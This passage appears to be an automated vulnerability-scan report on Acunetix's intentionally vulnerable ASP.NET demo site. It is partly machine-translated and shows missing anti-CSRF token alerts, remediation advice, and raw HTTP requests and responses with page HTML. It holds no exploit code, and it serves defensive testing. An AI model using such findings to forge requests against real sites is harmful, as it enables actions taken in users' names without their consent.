style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          <form name="Form1" method="post" action="ReadNews.aspx?id=3" id="Form1">
          Solution

          フェーズ: アーキテクチャと設計

          同脆弱性を引き起こさせない、あるいは容易に回避可能な精査されたライブラリ、あるいはフレームワークを使用してください。

          For example, use anti-CSRF packages such as the OWASP CSRFGuard.

          Phase: Implementation

          Ensure that your application is free of cross-site scripting issues, because most CSRF defenses can be bypassed using attacker-controlled script.

          Phase: Architecture and Design

          Generate a unique nonce for each form, place the nonce into the form, and verify the nonce upon receipt of the form. Be sure that the nonce is not predictable (CWE-330).

          Note that this can be bypassed using XSS.

          Identify especially dangerous operations. When the user performs a dangerous operation, send a separate confirmation request to ensure that the user intended to perform that operation.

          Note that this can be bypassed using XSS.

          Use the ESAPI Session Management control.

          This control includes a component for CSRF.

          Do not use the GET method for any request that triggers a state change.

          Phase: Implementation

          Check the HTTP Referer header to see if the request originated from an expected page. This could break legitimate functionality, because users or proxies may have disabled sending the Referer for privacy reasons.

        12. GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0
          Alert tags
          Alert description

          在提交的HTML表单中中找不到反CSRF令牌。

          A cross-site request forgery is an attack that involves forcing a victim to send an HTTP request to a target destination without their knowledge or intent in order to perform an action as the victim. The underlying cause is application functionality using predictable URL/form actions in a repeatable way. The nature of the attack is that CSRF exploits the trust that a web site has for a user. By contrast, cross-site scripting (XSS) exploits the trust that a user has for a web site. Like XSS, CSRF attacks are not necessarily cross-site, but they can be. Cross-site request forgery is also known as CSRF, XSRF, one-click attack, session riding, confused deputy, and sea surf.

          CSRF attacks are effective in a number of situations, including:

          * The victim has an active session on the target site.

          * The victim is authenticated via HTTP auth on the target site.

          * The victim is on the same local network as the target site.

          CSRF has primarily been used to perform an action against a target site using the victim's privileges, but recent techniques have been discovered to disclose information by gaining access to the response. The risk of information disclosure is dramatically increased when the target site is vulnerable to XSS, because XSS can be used as a platform for CSRF, allowing the attack to operate within the bounds of the same-origin policy.

          Other info

          No known Anti-CSRF token [anticsrf, CSRFToken, __RequestVerificationToken, csrfmiddlewaretoken, authenticity_token, OWASP_CSRFTOKEN, anoncsrf, csrf_token, _csrf, _csrfSecret, __csrf_magic, CSRF, _token, _csrf_token] was found in the following HTML form: [Form 1: "__EVENTARGUMENT" "__EVENTTARGET" "__EVENTVALIDATION" "__VIEWSTATE" "__VIEWSTATEGENERATOR" ].

          Request
          Request line and header section (342 bytes)
          GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:18 GMT
          Content-Length: 22752
          
          
          Response body (22752 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&amp;id=0" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA+PHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc+ICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8+bmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A+ICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A+ICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA+LSBTdXBwb3J0IGZvciBJUHY2PGJyIC8+ICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8+ICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8+ICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA+VGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E+LjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc+QWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc+PC9wPiAgICAgPHA+Rm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A+ZAIJDw8WAh4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg/aWQ9MGRkAgsPFgIeA3NyYwUMYWRzL2RlZi5odG1sZGTxtiNRXSWMk2xH7U3KJPX1k9tDKQ==" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLWjL6iDQK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q+dfic04fJFrwdgOeBd3JBjK63E5g==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>5/16/2019 12:32:30 PM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> &ndash; <strong>May 2019</strong> &ndash; Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p>     <p>&ldquo;No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,&rdquo; said Nicolas Sciberras, CTO.</p>     <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p>     <p><strong>More Features in the Latest Build</strong></p>     <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). This new build also includes:</p>     <p>- Support for IPv6<br />     - Improved usage of machine resources<br />     - Added support for Selenium scripts as import files<br />     - Multiple vulnerability checks for SAP<br />     - Unauthorized access detection for Redis and Memcached<br />     - Source code disclosure for Ruby and Python</p>     <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p>     <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p>     <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p>     <p><strong>Acunetix, the Company</strong></p>     <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a 